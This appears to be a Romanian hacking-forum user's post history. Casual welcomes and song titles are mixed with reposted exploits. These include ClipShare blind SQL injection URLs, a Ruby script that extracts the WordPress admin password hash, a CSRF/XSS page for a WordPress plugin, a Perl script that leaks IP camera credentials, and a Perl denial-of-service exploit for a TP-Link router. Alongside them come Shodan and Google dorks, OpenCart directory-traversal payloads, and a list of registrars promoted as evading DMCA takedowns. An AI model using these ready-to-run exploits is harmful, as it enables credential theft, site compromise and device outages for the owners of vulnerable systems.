Gonzalez
-
Posts
1576 -
Joined
-
Last visited
-
Days Won
9
Posts posted by Gonzalez
-
-
Metallica - Ride The Lightning.mp3
-Gonzalez
-
Bun venit pe RST.
-Gonzalez
-
Mie nu-mi merge cum trebuie forumul, ce ma fac?
)))-Gonzalez
-
Bun venit!
-Gonzalez
-
# Exploit Title: ClipShare 4.1.1 - Multiples Vulnerabilites
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
#all versions are vulnerable:
#Last Checked: 27 March 2013
# Note : to exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side.(php.ini)
==============================================================================================
vuln file : gvideos.php , param : gid
Poc :
http://server/mavideo/gvideos.php?gid=1 [Blind]
#to exlploit this poc , must group to be added previously with some videos publics
Real exploitation :
http://server/mavideo/gvideos.php?gid=1 AND 1=1
==> return normal page
http://server/mavideo/gvideos.php?gid=1 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : channel_detail.php , param : chid
Poc :
http://server/mavideo/channel_detail.php?chid=4 [Blind]
Real exploitation :
http://server/mavideo/channel_detail.php?chid=4 AND 1=1
==> return normal page
http://server/mavideo/channel_detail.php?chid=4 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : uprofile.php , param : UID
Poc :
http://server/mavideo/uprofile.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/uprofile.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/uprofile.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ufavour.php , param : UID
Poc :
http://server/mavideo/ufavour.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/ufavour.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/ufavour.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ufriends.php , param : UID
Poc :
http://server/mavideo/ufriends.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/ufriends.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/ufriends.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : uplaylist.php , param : UID
Poc :
http://server/mavideo/uplaylist.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/uplaylist.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/uplaylist.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
vuln file : ugroups.php , param : UID
Poc :
http://server/mavideo/ugroups.php?UID=66 [Blind]
Real exploitation :
http://server/mavideo/ugroups.php?UID=66 AND 1=1
==> return normal page
http://server/mavideo/ugroups.php?UID=66 AND 1=2
==> return page with some errors ( or with nothing - white page )
-------------------------------------------------------------------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday , March 27, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.
~ Game Over ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetz : White Tarbouch Team & Cobra & Dami
==> Made In Moroco <==
./EsacSource: Exploit-DB
-
Frumos articol. Clientul roman vrea sa faci gratis, sau sa il si platesti in timp ce faci proiectul.
-Gonzalez
-
Bun venit! Dar e cu limbajul tau?
-Gonzalez
-
Bun venit pe RST.
-Gonzalez
-
Bravo lui, cred ca e foarte frumos sa fi milionar la varsta lui.
-Gonzalez
-
Doar la mine e asa?
Dupa parerea mea ar trebui sa fie in mijloc. Oricum a-ti facut o treaba de nota 10, cu blog si cu homepage-ul. Bravo si felicitari.
-Gonzalez
-
La cati bani are doar 100.000$?
Corect spus.
-Gonzalez
-
Felicitari.
-Gonzalez
-
2005 - vremuri bune.
-Gonzalez
-
-
Curve, masini si coca.
-Gonzalez
-
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patc=
h (cli)
##############
# Description:
##############
# The "order" and "orderby" parameter is vulnerable for SQL Injection
# Example URL: http://127.0.0.1:9001/wordpress/wp-admin/admin.php?page=3Din=
ic_faq&orderby=3D<sqli>
# PoC take some time to finish (15min on my Testsystem).
# I could speed it up with Multithreading but I'm to lazy right now
#### Vulnerable code part (wp_list_table.php) #############################=
###################################
#
# function prepare_items() {
# $this->_column_headers =3D array($this->_columns, $this->_hidden_columns=
, $this->_sortable_columns);
# $sort_order =3D isset($_GET['order']) ? $_GET['order'] : "ASC";
# $orderby_column =3D isset($_GET['orderby']) ? " ORDER BY {$_GET['orderby=
']} {$sort_order}" : false;
#
# global $wpdb;
# if (is_array($this->_sql)) {
# if ($orderby_column =3D=3D false) {
# $data =3D $this->_sql;
# } else {
# $data =3D $this->_sql;
# usort($data, array(&$this, 'usort_reorder'));
# }
# } else {
# $data =3D $wpdb->get_results("{$this->_sql}{$orderby_column}", ARRAY_A=
);
# }
###########################################################################=
#####################################
#################################
#### Blind SQL Injection PoC ####
#################################
require "net/http"
require "uri"
$target =3D "" # EDIT ME #
$cookie =3D "" # EDIT ME # authenticated user session
# Example:
#$target =3D "http://127.0.0.1:9001/wordpress/"
#$cookie =3D "wordpress_a6a5d84619ae3f833460b386c064b9e5=3Dadmin%7C13640405=
45%7C86475c1a4fe1fc1fa5f1ebb04db1bc8f; wp-settings-1=3Deditor%3Dhtml; wp-se=
ttings-time-1=3D1363441353; comment_author_a6a5d84619ae3f833460b386c064b9e5=
=3Dtony; comment_author_email_a6a5d84619ae3f833460b386c064b9e5=3Dtony%40bau=
er.de; comment_author_url_a6a5d84619ae3f833460b386c064b9e5=3Dhttp%3A%2F%2Fs=
ucker.de; wordpress_test_cookie=3DWP+Cookie+check; wordpress_logged_in_a6a5=
d84619ae3f833460b386c064b9e5=3Dadmin%7C1364040545%7Cd7053b96adaa95745023b91=
694bf30ef; PHPSESSID=3D1h7f2o5defu6oa8iti6mqnevc7; bp-activity-oldestpage=
=3D1"
if $target.eql?("") or $cookie.eql?("")
puts "\n[!]\tPlease set $target and $cookie variable\n"
raise
end
$chars =3D ["."] + ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a
$hash =3D "$P$"
$i =3D 0 # chars index
$j =3D 4 # hash index
def sqli_send()
sqli =3D URI.escape("(CASE WHEN ((SELECT ASCII(SUBSTRING(user_pass, #{$=
j}, 1)) FROM wp_users WHERE id =3D 1) =3D #{$chars[$i].ord}) THEN 1 ELSE 1*=
(SELECT table_name FROM information_schema.tables)END) --")
uri =3D URI.parse("#{$target}wp-admin/admin.php?page=3Dinic_faq&orderby=
=3D#{sqli}")
http =3D Net::HTTP.new(uri.host, uri.port)
#http.set_debug_output($stderr)
request =3D Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] =3D "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8;=
rv:19.0) Gecko/20100101 Firefox/19.0"
request["Cookie"] =3D $cookie
resp =3D http.request(request)
if( resp.code !=3D "200" )
puts "something is wrong response =3D #{resp.code}"
raise
end
# In WordPress default settings there will no SQL error displayed
# but when an error apperes we don't get any result.
# The PoC search for "No record found" and suppose there was an error
return resp.body().match(/No record found/)=20
end
def print_status()
output =3D "HASH: #{$hash} try #{$chars[$i]}"
print "\b"*output.length + output
end
while( $hash.length < 34 )
if( !sqli_send() )
$hash +=3D $chars[$i]
$j +=3D 1
$i =3D 0
else
$i +=3D 1
end
print_status()
end
puts "\n[+]\thave a nice day \n" -
<html>
<!--
# Exploit Title: WordPress IndiaNIC FAQ 1.0 Plugin CSRF + XSS
# Google Dork: inurl:wp-content/plugins/faqs-manager
# Date: 21.03.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://wordpress.org/extend/plugins/faqs-manager/
# Software Link: http://downloads.wordpress.org/plugin/faqs-manager.zip
# Version: 1.0
# Tested on: Apache/2.2.16 (Debian) PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli)
##############
# Description:
##############
# IndiaNIC FAQ Settings Page is vulnerable for CSRF.
# The Ask Question area (front-end) is vulnerable for XSS. It is possible to insert <script>alert(1)</script> in question parameter.
# The Captcha value can be read from captcha parameter (hidden field)
#
###################################
#### Part of Ask Question form ####
###################################
<form action="" method="POST" name="iNICfaqsAskForm_1">
<input type="hidden" value="1" name="group_id">
<input type="hidden" value="1" name="from_user">
<input type="hidden" value="inic_faq_questions" name="action">
<input type="hidden" value="5540" name="captcha"> <=================== We don't need the captcha Image when we have this xD
####################################################################
#### Request from Ask Question area (XSS in question parameter) ####
####################################################################
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:9001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9001/wordpress/?p=11
Content-Length: 143
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
group_id=1&from_user=1&action=inic_faq_questions&captcha=8560&who_asked=lalalallala%40gmail.com&question=XSS+TEST+<script>alert(1)</script>%3F&captcha_code=8560
# When admin navigate to Question-Area (back-end) arbitrary JavaScript will execute.
#######################################################################
-->
<title>
#####################################################
############## IndiaNIC FAQ 1.0 CSRF ################
#####################################################
</title>
<body>
<!-- replace "127.0.0.1:9001/wordpress" -->
<form action="http://127.0.0.1:9001/wordpress/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="inic_faq_settings" />
<input type="hidden" name="alert_email_address" value="m3tamantra@127.0.0.1" />
<input type="hidden" name="capture_email" value="1" />
<input type="hidden" name="notify_when_answered" value="1" />
<input type="hidden" name="listing_template" value="lalalalalalalalalalalalal" />
<input type="hidden" name="custom_css" value="babaaaaaammmmmmmm" />
<input type="hidden" name="custom_js" value="alert(1234)" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html> -
#!/usr/bin/perl
#
# [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit
# Author: Todor Donev
# Email: todor.donev at gmail dot com
# Type: Hardware
#
# Thanks to Tsvetelina Emirska the best friend in my life
# and all my other friends for the help and support which
# gives me. Kind regards to all of you, who read my lil'
# exploits.
# Bulgaria, Sofia
# 03.2013
#
# Shodanhq r0x 4 teh lulz!!
# http://www.youtube.com/watch?v=qNyN1AY-YZQ Cheeerzz
#
# Another bug, hint: you can edit this code and add some lines for remote change the password.
#####
use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
}
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulneruble, $!\n");
print " [+] StarVedia IPCamera IC502w IC502w+ v020313 remote bypass username/password disclosure exploit\n";
print " [!] Exploiting: $t\n";
if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
$result .= " [o] User: $1\n";
}else{die(" Try another exploit, $!");}
if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){
$result .= " [o] Password: $1\n";
}else{die("Try another exploit or restart the exploit\n");}
sleep(1);
print " [\\m/] BINGO!!!\n\a".$result;
}
sub usg(){
print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
print " [!] -d: disclosure password option\n";
print " [!] exp: perl $0 -d 127.0.0.1 \n";
exit;
} -
[waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
===============================================================================
Author: Janek Vind "waraxe"
Date: 19. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-98.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and your ready to start
accepting orders.
http://www.opencart.com/
Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.
###############################################################################
1. Directory Traversal Vulnerabilities in "filemanager.php"
###############################################################################
Reason: insufficient sanitization of user-supplied data
Attack vectors:
1. user-supplied POST parameters "directory", "name", "path", "from", "to"
Preconditions:
1. Logged in as admin with filemanager access privileges
Script "filemanager.php" offers for OpenCart admins various file related services:
directory listing and creation, image file listing, file copy/move/unlink, upload,
image resize. By the design OpenCart admin can manage files and directories only
inside specific subdirectory "image/data/". It means, that even if you have
OpenCart admin privileges, you still are not suppose to get access to the files
and directories below "image/data/". So far, so good.
But what about directory traversal? Let's have a look at the source code.
PHP script "admin/controller/common/filemanager.php" line 66:
------------------------[ source code start ]----------------------------------
public function directory() {
$json = array();
if (isset($this->request->post['directory'])) {
$directories = glob(rtrim(DIR_IMAGE . 'data/' .
str_replace('../', '', $this->request->post['directory']), '/') .
'/*', GLOB_ONLYDIR);
if ($directories) {
$i = 0;
foreach ($directories as $directory) {
$json[$i]['data'] = basename($directory);
$json[$i]['attributes']['directory'] =
utf8_substr($directory, strlen(DIR_IMAGE . 'data/'));
...
$this->response->setOutput(json_encode($json));
------------------------[ source code end ]------------------------------------
We can see, that directory traversal is prevented by removing "../" substrings
from user submitted parameters. At first look this seems to be secure enough -
if we can't use "../", then directory traversal is impossible, right?
Deeper analysis shows couple of shortcomings in specific filtering method.
First problem - if OpenCart is hosted on Windows platform, then it's possible
to use "..\" substring for directory traversal.
Test (parameter "token" must be valid):
-------------------------[ test code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
<input type="hidden" name="directory" value="..\..\..\">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------[ test code end ]------------------------------------
Server response is in JSON format and contains listing of subdirectories outside
of OpenCart main directory.
Second problem - filtering with "str_replace" can be tricked by using custom
strings. If we use "..././" substring, then after filtering in becomes "../".
So it appears, that implemented anti-traversal code is ineffective and can
be bypassed.
Test (parameter "token" must be valid):
-------------------------[ test code start ]-----------------------------------
<html><body><center>
<form action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25" method="post">
<input type="hidden" name="directory" value="..././..././..././..././">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------[ test code end ]------------------------------------
Server response is exactly same as in previous test - information about directory
structure outside of OpenCart main directory has been disclosed.
PHP script "filemanager.php" contains 14 uses of "str_replace('../', ''," code.
Most of the public functions in "filemanager.php" are affected by directory
traversal vulnerability:
public function directory() -> listing of subdirectories
public function files() -> listing of image files
public function create() -> creation of new directories
public function delete() -> deletion of arbitrary files and directories
public function move() -> renaming of files or directories
public function copy() -> copying of files or directories
public function rename() -> renaming of files or directories
public function upload() -> uploading of image or flash files
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------ -
Sorry I forgot to write headers in previous mail.
# Exploit Title: [possible ways to exploit CVE-2012-1663( GNUTLS-3.0.13)]
# Google Dork: [if relevant] (we will automatically add these to the GHDB)
# Date: [Mar 20, 2013]
# Exploit Author: [Shawn the R0ck]
# Vendor Homepage: [http://www.gnutls.org/]
# Software Link: [download link if available]
# Version: [<= 3.0.13]
# Tested on: [GNU/Linux]
# CVE : [CVE-2012-1663]
PoC: http://www.exploit-db.com/sploits/24865.tar.bz2
I'm glad to share this to you guys. The test code was attached. You
also could find them here:
https://github.com/citypw/arsenal-4-sec-testing/tree/master/libgnutls/CVE-2012-1663
CVE-2013-1663[1] is a possible remote DOS attack issue. This issue has
been fixed[2] in >=GNUTLS-3.0.14. I hacked on it for hours and figure out
a few prerequisites could make it vulnerable:
=============================
REQUIRED:
- prior to GNUTLS 3.0.14
- crafted certificate
=============================
Attacking SCENES
- a client import a crafted cert file for sending req to server( CA?)
- a "server" import a crafted cert file for sending req to other
server( CA?)
---> With high frequency uses above manipulations
Stand on the client side, the attacker should try to construct a
crafted certificate for triggering the below function fails:
ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
if (ret < 0)
{
gnutls_pubkey_deinit(pcert->pubkey);
/* pcert->pubkey should be NULL now */
ret = gnutls_assert_val(ret);
goto cleanup;
}
I made up two crafted cert files( client.pem, client2.pem) seems would
trigger the double free issue in client's side.
Warning: Don't try it on your host machine because it would cost too
much memory then makes your machine very slow.
shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
processing server set to null?
Server ready. Listening to port '5556'.
shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
................
.................
...................
Another terminal: killall client
Test platform: Slackware 13.37 + GNUTLS-3.0.13
[1] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1663
[2] Upstream fix
http://git.savannah.gnu.org/gitweb/?p=gnutls.git;a=commitdiff;h=9c62f4feb2bdd6fbbb06eb0c60bfdea80d21bbb8
--
GNU powered it...
GPL protect it...
God blessing it...
regards
Shawn -
?#!/usr/local/bin/perl
#
#
# TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit
#
#
# Vendor: TP-LINK Technologies Co., Ltd.
# Product web page: http://www.tp-link.us
#
# Affected version:
#
# - Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
# - Hardware version: WR740N v4 00000000 (v4.23)
# - Model No. TL-WR740N / TL-WR740ND
#
# Summary: The TL-WR740N is a combined wired/wireless network connection
# device integrated with internet-sharing router and 4-port switch. The
# wireless N Router is 802.11b&g compatible based on 802.11n technology
# and gives you 802.11n performance up to 150Mbps at an even more affordable
# price. Bordering on 11n and surpassing 11g speed enables high bandwidth
# consuming applications like video streaming to be more fluid.
#
# Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
# remote denial of service vulnerability when processing a HTTP request. This
# issue occurs when the web server (httpd) fails to handle a HTTP GET request
# over a given default TCP port 80. Sending a sequence of three dots (...) to
# the router will crash its httpd service denying the legitimate users access
# to the admin control panel management interface. To bring back the http srv
# and the admin UI, a user must physically reboot the router.
#
#
# ============================== Playground: ==============================
#
# Shodan: WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
#
# # nmap -sV 192.168.0.1
#
# Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:53 Central European Standard Time
# Nmap scan report for 192.168.0.1
# Host is up (0.00s latency).
# Not shown: 999 closed ports
# PORT STATE SERVICE VERSION
# 80/tcp open http TP-LINK WR740N WAP http config
# MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
# Service Info: Device: WAP
#
# Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
# Nmap done: 1 IP address (1 host up) scanned in 12.42 seconds
#
# --------------------------------------------------------------------------
# Changed Probe Directive in nmap-service-probes file [4 d range]:
# - Line: 4682: Probe TCP GetRequest q|GET / HTTP/1.0\r\n\r\n|
# + Line: 4682: Probe TCP GetRequest q|GET /... HTTP/1.0\r\n\r\n|
# --------------------------------------------------------------------------
#
# # nping -c1 --tcp -p80 192.168.0.1 --data "474554202f2e2e2e20485454502f312e310d0a0d0a"
#
# Starting Nping 0.6.01 ( http://nmap.org/nping ) at 2013-03-19 04:55 Central European Standard Time
# SENT (0.0920s) TCP 192.168.0.101:19835 > 192.168.0.1:80 S ttl=64 id=21796 iplen=61 seq=1961954057 win=1480
# RCVD (0.1220s) TCP 192.168.0.1:80 > 192.168.0.101:19835 RA ttl=64 id=0 iplen=40 seq=0 win=0
#
# Max rtt: 0.000ms | Min rtt: 0.000ms | Avg rtt: 0.000ms
# Raw packets sent: 1 (75B) | Rcvd: 1 (46B) | Lost: 0 (0.00%)
# Tx time: 0.04000s | Tx bytes/s: 1875.00 | Tx pkts/s: 25.00
# Rx time: 1.04000s | Rx bytes/s: 44.23 | Rx pkts/s: 0.96
# Nping done: 1 IP address pinged in 1.12 seconds
#
# --------------------------------------------------------------------------
#
# # nmap -Pn 192.168.0.1 -p80
#
# Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-19 04:57 Central European Standard Time
# Nmap scan report for 192.168.0.1
# Host is up (0.00s latency).
# PORT STATE SERVICE
# 80/tcp closed http
# MAC Address: AA:BB:CC:DD:EE:FF (Tp-link Technologies CO.)
#
# Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
#
# ============================= !Playground ===============================
#
#
# Tested on: Router Webserver
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Copyleft (c) 2013, Zero Science Lab
# Macedonian Information Security Research And Development Laboratory
# http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2013-5135
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5135.php
#
#
# 17.03.2013
#
use IO::Socket;
$ip="$ARGV[0]"; $port="$ARGV[1]";
print "\n\n\x20"."\x1f"x42 ."\n";
print "\x20\x1f"."\x20"x40 ."\x1f\n";
print "\x20\x1f TP-Link TL-WR740N httpd DoS Exploit \x1f\n";
print "\x20\x1f"."\x20"x40 ."\x1f\n";
print "\x20\x1f"."\x20"x7 ."\x16"x5 ."\x20"x15 ."\x16"x5 ."\x20"x8 ."\x1f\n";
print "\x20\x1f"."\x20"x9 ."\x16"."\x20"x19 ."\x16"."\x20"x10 ."\x1f\n";
print "\x20" ."\x1f"x42 ."\n";
print "\x20\x4" ."\x20"x40 ."\x4\n";
print "\x20" ."\x1e" x 42 ."\n";
if($#ARGV<1)
{
print "\n\n\x20\x20\x1a\x20Usage: $0 <ip> <port>\n\n";
exit();
}
$socket=IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => $ip,
PeerPort => $port
);
$ta4ke="\x47\x45\x54\x20".
"\x2f\x2e\x2e\x2e".
"\x20\x48\x54\x54".
"\x50\x2f\x31\x2e".
"\x31\x0d\x0a\x0d".
"\x0a";
print "\n\x20\x1a\x20Sending evil payload...\n"; sleep 2;
print $socket "$ta4ke"; sleep 5; close $socket;
print "\x20\x1a\x20HTTPd successfully poked.\n"; sleep 2;
print "\x20\x1a\x20Verifying with Nmap...\n"; sleep 2;
system("nmap -Pn $ip -p $port");
print "\n\x20\x1a\x20Playing goa-psy...\n"; sleep 2;
system("start C:\\Progra~1\\Winamp\\winamp.exe http://scfire-ntc-aa01.stream.aol.com:80/stream/1008");
sleep 1; print "\x20\x1a\x20All Done!\n"; sleep 1;
# Codename: Threetwoees -
This post would contain a list of domain registrars that are offshore.By 'offshore' i mean they won't share your data to 3rd parties like USA companies and won't suspend domain based on DMCA.
Here we go
http://prq.se/
-Offer Anonymous Domain Registration (Based in Sweden)
http://www.binero.se/
-PirateBay.se Domain registar
http://netart-registrar.com/
- torrentz.eu domain registrar
http://www.webnames.ru
-Good registrar for .su and .ws
Remember:If you chose a .com , .net , .org you will still be subjected to US law.This means a court order to verisign and you lost your domain.
Some Offshore domain tld : .ws , .su
-
-
Eminem - Stan (Long Version) ft. Dido
-Gonzalez
Make money uploading files?
in Off-topic
Posted
Uite aici:
E plin de uploaderi acolo si cica e Webmaster Forum, vei gasi informatii utile despre programele care te intereseaza.
-Gonzalez